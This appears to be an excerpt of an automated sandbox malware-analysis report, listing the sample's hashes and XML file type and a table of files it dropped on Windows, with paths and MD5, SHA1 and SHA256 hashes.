Architecture:	WINDOWS
MD5:	734c9d6b82b44237e5befe07faa4149b
SHA1:	b6a244eeb8ed209f2222b112cf2925f7eac7d1db
SHA256:	4949351915c2627905d17fe54bb56341f0af23331257e235b79eaa876fcad8cf
Filetype:	Generic XML (ASCII) (5005/1) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	BC6DB77EB243BF62DC31267706650173	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhjghg51.z0h.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s40pbzt4.vzk.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sd2ve3te.4le.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1idxvew.52z.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\s5497I81	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8	D87270D0039ED3A5A72E7082EA71E305	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
C:\Users\user\AppData\Roaming\Ballepresseres.Ine	ASCII text, with very long lines (65536), with no line terminators	FB1388CAFBE0C43746D3A61F339A3AE5	CDA5A6852084BDF75A34466827941CB6300D4EC6	B5D3EBABC73DF8F7ABB77FE3DE2820DD4D661CC144A577A79ED79272301B71E4